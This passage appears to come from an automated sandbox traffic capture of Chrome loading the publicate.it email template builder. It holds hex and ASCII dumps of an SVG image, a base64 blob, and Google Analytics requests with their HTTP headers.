                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 52 76 41 30 47 4e 77 34 6d 54 78 6f 61 46 41 63 46 6b 68 67 58 41 54 78 46 35 41 62 35 6d 2b 2b 53 76 54 54 32 6d 4e 52 50 47 68 57 6a 6e 64 39 79 50 33 48 5a 4a 35 37 32 73 33 5a 71 63 54 35 34 5a 56 4c 56 4b 66 46 64 6e 62 47 52 78 66 74 54 2f 4b 72 6b 46 6a 6c 65 48 43 73 52 55 67 67 63 51 32 64 42 52 38 73 45 43 35 4e 5a 4a 56 48 36 6f 64 42 36 50 35 55 4e 55 44 37 48 71 36 37 38 77 70 76 68 51 4c 6e 76 68 58 74 38 6d 61 4a 33 6f 48 46 36 55 6d 58 2b 74 56 38 33 6f 78 70 70 37 75 75 33 6d 50 57 6e 78 34 56 47 32 46 6f 6c 62 35 38 30 43 67 56 67 49 6b 6b 46 70 4a 63 35 32 61 43 4e 54 71 41 4b 65 54 30 33 31 6e 5a 57 54 35 46 77 2f 4c 68 55 76 33 31 4b 52 2b 51 31 31 45 54 2f 66 64 70 46 6f 6a 59 78 75 6c 74 45 56 4d 46 47 4e 42 51 31 32 58 37 79 46 41
                                                                                                                                                                                                        Data Ascii: RvA0GNw4mTxoaFAcFkhgXATxF5Ab5m++SvTT2mNRPGhWjnd9yP3HZJ572s3ZqcT54ZVLVKfFdnbGRxftT/KrkFjleHCsRUggcQ2dBR8sEC5NZJVH6odB6P5UNUD7Hq678wpvhQLnvhXt8maJ3oHF6UmX+tV83oxpp7uu3mPWnx4VG2Folb580CgVgIkkFpJc52aCNTqAKeT031nZWT5Fw/LhUv31KR+Q11ET/fdpFojYxultEVMFGNBQ12X7yFA
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 64 34 72 6c 30 43 4a 42 43 37 34 6b 46 70 68 69 45 77 65 4d 44 5a 35 48 47 79 74 54 6a 35 55 47 2f 39 4d 72 62 52 6c 7a 6e 71 31 4d 45 66 47 6a 78 72 5a 4e 4d 44 4c 62 4b 6e 4d 36 38 32 68 36 51 56 4d 6f 7a 62 4e 42 46 50 49 59 45 6b 49 73 7a 75 56 62 4a 79 77 4e 6e 34 63 62 4a 54 55 37 4a 2b 35 58 53 35 53 72 56 47 74 71 6f 64 68 72 76 55 79 59 64 52 54 76 63 31 4f 52 5a 30 36 39 73 61 35 61 6a 71 53 61 74 32 2f 64 79 37 51 35 4e 52 49 78 4a 49 4d 75 4c 73 62 43 31 74 57 6e 79 6f 70 37 39 75 58 44 56 64 74 6d 7a 4c 53 38 65 68 51 6d 6e 51 75 63 70 44 49 32 4a 36 4c 4f 67 76 62 35 30 6f 48 59 63 4c 6b 52 77 4e 37 4f 78 4e 36 6e 44 46 53 43 41 4f 42 7a 63 70 56 64 4f 74 6b 54 46 31 76 74 69 77 76 31 51 74 64 72 73 31 4f 52 61 6b 70 2f 66 4f 55 51 64 6c 35
                                                                                                                                                                                                        Data Ascii: d4rl0CJBC74kFphiEweMDZ5HGytTj5UG/9MrbRlznq1MEfGjxrZNMDLbKnM682h6QVMozbNBFPIYEkIszuVbJywNn4cbJTU7J+5XS5SrVGtqodhrvUyYdRTvc1ORZ069sa5ajqSat2/dy7Q5NRIxJIMuLsbC1tWnyop79uXDVdtmzLS8ehQmnQucpDI2J6LOgvb50oHYcLkRwN7OxN6nDFSCAOBzcpVdOtkTF1vtiwv1Qtdrs1ORakp/fOUQdl5
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 61 57 73 4e 36 45 55 39 79 58 6f 41 45 34 6e 79 49 71 65 42 49 42 63 70 4a 77 73 53 43 42 7a 30 39 74 37 74 48 53 6f 73 43 48 2f 37 6b 5a 48 6e 58 6c 62 56 76 64 5a 54 64 46 71 6f 75 76 56 37 56 66 61 5a 50 52 6f 77 79 59 5a 61 76 78 35 2f 78 45 53 43 42 78 43 64 57 6c 44 51 42 41 72 72 56 6f 55 2f 38 32 36 38 47 79 6e 55 33 32 51 59 31 50 58 65 75 32 6a 37 64 78 45 4e 33 57 2b 6d 57 52 79 6c 35 71 4a 6c 6c 65 6a 45 6d 44 77 51 71 42 62 67 6a 4b 6a 58 34 4f 77 49 47 42 51 59 76 43 74 54 54 63 30 30 6c 44 37 32 53 66 74 47 79 64 75 6c 57 59 30 47 36 35 55 48 79 4d 48 68 6a 57 48 78 70 4d 2f 2b 30 73 52 69 45 6f 69 46 51 61 77 47 39 4b 44 43 6e 46 67 57 57 57 78 31 36 55 57 43 74 31 6e 55 4d 56 56 65 39 73 50 4b 6f 6d 6f 32 6d 56 39 4b 58 5a 35 63 4e 39 54
                                                                                                                                                                                                        Data Ascii: aWsN6EU9yXoAE4nyIqeBIBcpJwsSCBz09t7tHSosCH/7kZHnXlbVvdZTdFqouvV7VfaZPRowyYZavx5/xESCBxCdWlDQBArrVoU/8268GynU32QY1PXeu2j7dxEN3W+mWRyl5qJllejEmDwQqBbgjKjX4OwIGBQYvCtTTc00lD72SftGydulWY0G65UHyMHhjWHxpM/+0sRiEoiFQawG9KDCnFgWWWx16UWCt1nUMVVe9sPKomo2mV9KXZ5cN9T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        79192.168.2.549855104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC925OUTGET /images/hubspot_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:23 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 34485
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "86b5-620aa1d25a590"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Cg1RI72lT4ch9gyO7sfWT1PUpWZo3b3skmftn6qC7QlTkIMNbMu46raqHKvcHBWjl4fgC5pQrUtV2BESPKRuZICbbbyRSNBbdalucCWr%2FyPDjgAfhV1IUmCd3pbrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c33eac4259-EWR
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC622INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 37 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>7</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69
                                                                                                                                                                                                        Data Ascii: <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviati
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 3a 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 67 41 41 41 41 49 41 43 41 59 41 41 41 44 30 65 4e 54 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 41 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 41 41 41 41 41 41 41 4c 2b 4c 57 46 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 32 64 43 5a 67 63 56 62 6e 33 33 31 4d 39 50 64 6b 67 62 41 46 5a 6c 55 56 32 57 56 56 45 51 46 6b 55 4a 63 6f 6d 32 4a 6c 4a 57 43
                                                                                                                                                                                                        Data Ascii: :href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAACAKADAAQAAAABAAACAAAAAAAL+LWFAABAAElEQVR4Ae2dCZgcVbn331M9PdkgbAFZlUV2WVVEQFkUJcom2JlJWC
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 67 66 31 70 46 34 6b 6c 45 76 51 33 56 66 75 38 2f 30 6d 37 6f 2f 53 50 42 45 69 41 42 45 67 67 58 67 4b 52 4a 77 41 59 37 58 38 4d 42 76 79 56 34 46 62 73 34 77 33 69 52 52 6d 5a 4e 68 66 44 4a 62 36 4b 78 77 45 33 52 71 61 42 67 6b 6d 41 42 4b 77 68 55 4e 30 41 4c 54 38 61 4f 35 37 71 48 66 48 44 61 57 66 73 49 37 4b 74 69 44 74 4f 6c 4c 4d 4f 48 71 47 75 41 30 4f 39 31 34 6f 42 31 49 76 78 2f 6a 33 30 72 72 34 6e 32 76 58 2b 58 34 54 50 2f 38 42 33 37 67 4a 38 62 7a 77 6a 35 61 58 50 71 49 74 75 65 52 66 6e 65 4a 44 41 57 67 51 69 54 51 42 30 61 32 45 66 74 50 74 33 51 2b 76 6f 74 54 54 7a 68 42 38 43 37 34 72 72 37 4b 4e 6d 7a 6c 33 6f 70 78 4c 4c 6b 67 41 4a 32 45 39 41 54 79 6c 73 6a 49 62 37 59 44 54 59 68 36 44 42 78 2f 2b 79 51 38 68 57 59 33 30
                                                                                                                                                                                                        Data Ascii: gf1pF4klEvQ3Vfu8/0m7o/SPBEiABEggXgKRJwAY7X8MBvyV4Fbs4w3iRRmZNhfDJb6KxwE3RqaBgkmABKwhUN0ALT8aO57qHfHDaWfsI7KtiDtOlLMOHqGuA0O914oB1Ivx/j30rr4n2vX+X4TP/8B37gJ8bzwj5aXPqItueRfneJDAWgQiTQB0a2EftPt3Q+votTTzhB8C74rr7KNmzl3opxLLkgAJ2E9ATylsjIb7YDTYh6DBx/+yQ8hWY30
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 32 65 4b 61 47 6e 77 4f 46 56 4e 37 37 77 69 52 54 35 6c 78 70 58 36 65 67 44 4b 6a 5a 4e 42 69 6f 32 2f 2b 64 73 46 69 64 69 6f 67 6e 6b 7a 61 41 45 4a 70 4a 63 41 66 76 6b 66 6a 73 62 75 66 2b 45 68 47 2f 39 56 59 56 5a 59 4f 66 44 6e 59 48 50 4d 71 6c 4e 38 6c 78 51 43 39 53 55 41 6f 6b 35 4c 69 71 50 70 74 31 4e 35 79 52 67 50 45 69 43 42 43 41 68 67 39 37 34 44 4d 4d 31 76 48 6b 52 7a 73 50 50 61 66 48 4e 67 4d 31 74 50 6d 62 44 2f 32 70 64 34 78 6d 59 43 67 54 4e 5a 33 64 4b 30 4e 2f 4c 67 50 39 76 73 58 4f 5a 73 63 39 7a 64 31 62 54 53 45 35 6e 7a 6d 77 36 54 51 49 51 45 64 4f 75 6b 6a 34 68 55 2f 67 49 56 47 30 61 6f 4a 67 57 69 31 5a 76 53 55 39 6c 62 58 56 6a 36 5a 77 71 63 79 59 51 4c 77 58 73 41 48 47 47 58 6a 32 32 33 69 46 5a 38 44 47 42 62
                                                                                                                                                                                                        Data Ascii: 2eKaGnwOFVN77wiRT5lxpX6egDKjZNBio2/+dsFidiognkzaAEJpJcAfvkfjsbuf+EhG/9VYVZYOfDnYHPMqlN8lxQC9SUAok5LiqPpt1N5yRgPEiCBCAhg974DMM1vHkRzsPPafHNgM1tPmbD/2pd4xmYCgTNZ3dK0N/LgP9vsXOZsc9zd1bTSE5nzmw6TQIQEdOukj4hU/gIVG0aoJgWi1ZvSU9lbXVj6ZwqcyYQLwXsAHGGXj223iFZ8DGBb
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 59 41 79 51 6b 57 4c 54 56 46 51 44 6b 48 6d 46 4b 64 59 62 33 63 47 38 43 53 34 50 74 4c 41 46 78 35 77 78 4b 37 61 63 5a 77 42 48 71 63 35 63 4d 56 34 58 55 53 49 41 45 58 57 2f 2f 79 69 4a 57 41 71 38 67 38 56 75 43 44 4b 2f 4f 58 41 44 51 32 76 44 71 34 4b 46 36 78 69 6b 43 35 38 57 57 72 37 4b 45 78 4a 47 41 6c 41 62 57 54 6c 57 61 6c 32 53 67 6c 4f 36 62 5a 76 53 54 35 35 69 38 42 6b 4f 32 38 48 6f 43 65 4a 44 6d 59 55 56 76 66 55 68 66 50 66 6a 2b 6a 76 74 4e 74 45 71 69 4a 67 43 34 65 35 4b 33 38 74 31 31 4e 68 56 6b 6f 54 41 4c 62 39 37 45 50 55 79 5a 6c 42 53 44 67 4b 77 46 51 78 61 4c 33 58 50 6e 4e 41 48 70 59 4a 56 34 43 2f 34 70 58 48 62 57 52 51 41 49 4a 39 47 7a 73 4e 66 36 4e 43 62 51 38 36 53 59 33 79 72 4b 4e 74 30 36 36 45 32 6d 77 33
                                                                                                                                                                                                        Data Ascii: YAyQkWLTVFQDkHmFKdYb3cG8CS4PtLAFx5wxK7acZwBHqc5cMV4XUSIAEXW//yiJWAq8g8VuCDK/OXADQ2vDq4KF6xikC58WWr7KExJGAlAbWTlWal2SglO6bZvST55i8BkO28HoCeJDmYUVvfUhfPfj+jvtNtEqiJgC4e5K38t11NhVkoTALb97EPUyZlBSDgKwFQxaL3XPnNAHpYJV4C/4pXHbWRQAIJ9GzsNf6NCbQ86SY3yrKNt066E2mw3
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 55 63 63 36 53 52 46 71 65 51 71 4e 44 53 51 43 71 75 38 39 70 4e 53 32 46 66 4c 4c 6b 30 6a 69 4d 43 35 69 76 57 79 65 63 69 33 6c 52 47 4e 37 42 67 77 51 79 51 38 42 62 32 70 78 48 48 41 53 55 76 6a 30 4f 4e 64 52 52 47 34 46 51 45 6f 43 71 71 73 61 64 72 6b 61 7a 63 58 39 74 61 6c 6e 4b 55 67 49 35 74 50 30 58 53 6d 76 54 7a 62 70 34 39 50 71 57 32 6b 69 7a 53 43 42 63 41 6f 36 2b 4c 6c 79 42 6c 44 59 6f 41 61 56 4c 67 31 37 6a 68 64 67 4a 68 50 70 4c 54 30 2b 5a 75 4a 4d 34 72 6a 66 46 67 2b 76 50 78 78 37 4b 30 42 58 2b 44 62 45 38 56 6b 30 72 50 52 47 36 5a 41 6f 6b 41 63 73 49 36 4e 61 6d 70 32 48 53 7a 70 61 5a 6c 54 5a 7a 46 71 72 32 4c 6a 4b 32 4b 4b 72 68 39 51 44 41 4b 54 56 7a 37 6b 4b 4d 4c 4a 39 6c 6b 58 38 30 4a 54 69 42 37 63 56 31 2f 6f
                                                                                                                                                                                                        Data Ascii: Ucc6SRFqeQqNDSQCqu89pNS2FfLLk0jiMC5ivWyeci3lRGN7BgwQyQ8Bb2pxHHASUvj0ONdRRG4FQEoCqqsadrkazcX9talnKUgI5tP0XSmvTzbp49PqW2kizSCBcAo6+LlyBlDYoAaVLg17jhdgJhPpLT0+ZuJM4rjfFg+vPxx7K0BX+DbE8Vk0rPRG6ZAokAcsI6Namp2HSzpaZlTZzFqr2LjK2KKrh9QDAKTVz7kKMLJ9lkX80JTiB7cV1/o
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 45 70 6b 2f 75 78 78 72 67 6e 79 52 4b 2f 34 6c 36 7a 36 77 49 67 48 77 6b 4f 6c 7a 6a 31 78 58 38 71 4d 75 78 74 76 4a 79 55 4a 49 61 33 30 51 36 4a 42 46 36 35 32 75 4f 6a 71 34 36 35 6f 50 61 43 78 71 42 77 48 64 4e 75 46 6f 30 65 6f 36 57 4a 4f 7a 77 79 4a 72 72 48 43 78 63 4e 4a 45 4c 4b 55 38 7a 78 71 4c 61 45 68 4e 42 4b 78 4a 41 46 5a 59 32 2f 64 48 64 67 6b 2b 62 37 76 69 48 50 39 50 46 59 48 37 4d 41 69 30 71 54 6f 4f 4a 46 56 75 30 5a 6b 73 45 4e 42 74 54 64 2f 41 77 4d 43 66 5a 73 48 58 47 6e 33 30 78 76 72 2b 4a 7a 61 41 36 36 69 78 50 49 74 5a 52 4d 44 59 47 49 44 42 47 4b 6a 70 38 32 36 53 4a 55 74 32 77 52 2f 5a 75 53 69 7a 65 4c 42 79 43 54 79 2f 47 47 50 69 4f 32 47 33 6d 30 44 62 77 7a 54 35 73 39 4c 74 2f 42 6c 4c 52 42 38 51 70 6c 44
                                                                                                                                                                                                        Data Ascii: Epk/uxxrgnyRK/4l6z6wIgHwkOlzj1xX8qMuxtvJyUJIa30Q6JBF652uOjq465oPaCxqBwHdNuFo0eo6WJOzwyJrrHCxcNJELKU8zxqLaEhNBKxJAFZY2/dHdgk+b7viHP9PFYH7MAi0qToOJFVu0ZksENBtTd/AwMCfZsHXGn30xvr+JzaA66ixPItZRMDYGIDBGKjp826SJUt2wR/ZuSizeLByCTy/GGPiO2G3m0DbwzT5s9Lt/BlLRB8QplD
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 38 71 79 78 73 6e 71 34 74 6e 76 78 36 65 55 6d 6b 67 67 48 41 4a 34 76 4c 65 4f 6c 4a 30 72 49 61 30 51 6a 73 53 49 70 47 68 39 6e 54 54 71 6b 7a 6b 6c 4e 79 4b 2b 46 6f 72 4e 65 6a 65 7a 68 53 48 70 4e 55 6c 4e 4c 2f 30 44 4b 79 4c 75 68 30 39 63 59 6c 50 4c 4a 42 6e 52 2f 59 69 65 55 74 6a 46 32 6f 44 52 4d 42 49 59 68 45 42 76 67 36 6f 66 48 2b 53 79 52 61 65 64 78 39 6e 34 57 78 53 4f 47 45 78 68 41 68 41 44 35 4b 41 71 71 69 73 69 74 6e 65 64 68 72 45 49 36 45 61 55 72 48 66 48 37 59 54 35 78 77 39 67 32 75 52 58 67 2f 4a 6b 50 52 49 67 41 52 49 67 67 56 55 45 6d 41 43 73 59 6d 48 74 4f 30 79 2f 75 52 70 72 48 75 77 50 41 2f 39 68 72 5a 48 78 47 4c 59 75 42 6c 62 4e 30 36 30 54 66 71 51 6e 54 38 37 48 6f 35 4a 61 53 49 41 45 53 43 43 64 42 4a 67 41
                                                                                                                                                                                                        Data Ascii: 8qyxsnq4tnvx6eUmkggHAJ4vLeOlJ0rIa0QjsSIpGh9nTTqkzklNyK+ForNejezhSHpNUlNL/0DKyLuh09cYlPLJBnR/YieUtjF2oDRMBIYhEBvg6ofH+SyRaedx9n4WxSOGExhAhAD5KAqqisitnedhrEI6EaUrHfH7YT5xw9g2uRXg/JkPRIgARIggVUEmACsYmHtO0y/uRprHuwPA/9hrZHxGLYuBlbN060TfqQnT87Ho5JaSIAESCCdBJgA
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 70 66 45 71 57 2b 44 7a 56 75 68 4b 71 53 49 50 70 67 4b 58 63 2f 6f 71 63 32 66 79 6f 4a 78 74 4a 47 45 69 41 42 45 71 69 46 41 42 4f 41 57 69 68 6c 74 49 77 71 6c 53 70 71 65 6d 64 52 6c 42 77 46 42 4e 6d 65 4b 69 69 79 6c 62 6a 36 58 75 34 71 6d 4e 45 2f 42 72 70 4e 41 69 6b 6b 77 41 51 67 68 55 45 4e 32 79 55 31 76 65 73 32 71 62 6a 37 51 4f 37 6a 59 63 74 4f 6d 4c 77 56 75 77 70 65 7a 61 6d 43 43 59 73 63 7a 53 55 42 45 6c 69 4c 41 42 4f 41 74 5a 44 77 78 45 41 45 31 4b 7a 53 63 35 49 66 68 53 35 77 64 65 56 41 31 7a 4e 32 37 67 52 4d 46 66 77 44 70 77 70 6d 4c 4f 70 30 6c 77 52 53 52 6f 41 4a 51 4d 6f 43 47 71 55 37 76 56 4d 46 4f 37 2f 4f 71 59 4a 56 79 6e 74 68 71 75 44 44 75 6d 33 69 59 56 45 79 70 32 77 53 49 41 45 53 69 49 6f 41 45 34 43 6f 79
                                                                                                                                                                                                        Data Ascii: pfEqW+DzVuhKqSIPpgKXc/oqc2fyoJxtJGEiABEqiFABOAWihltIwqlSpqemdRlBwFBNmeKiiylbj6Xu4qmNE/BrpNAikkwAQghUEN2yU1ves2qbj7QO7jYctOmLwVuwpezamCCYsczSUBEliLABOAtZDwxEAE1KzSc5IfhS5wdeVA1zN27gRMFfwDpwpmLOp0lwRSRoAJQMoCGqU7vVMFO7/OqYJVynthquDDum3iYVEyp2wSIAESiIoAE4Coy


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        80192.168.2.549856216.58.212.1424436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1303OUTPOST /g/collect?v=2&tid=G-JL3QGDSQZ4&gtm=45je48s0v874630860z8850968419za200zb850968419&_p=1725034578026&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=0&cid=1381680606.1725034579&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1725034582&sct=1&seg=0&dl=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&dt=Publicate%20%7C%20HTML%20Email%20Template%20Builder&en=page_view&_fv=1&_ss=1&tfd=5926 HTTP/1.1
                                                                                                                                                                                                        Host: analytics.google.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC446INHTTP/1.1 204 No Content
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        81192.168.2.54985774.125.133.1564436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC822OUTPOST /g/collect?v=2&tid=G-JL3QGDSQZ4&cid=1381680606.1725034579&gtm=45je48s0v874630860z8850968419za200zb850968419&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=0 HTTP/1.1
                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
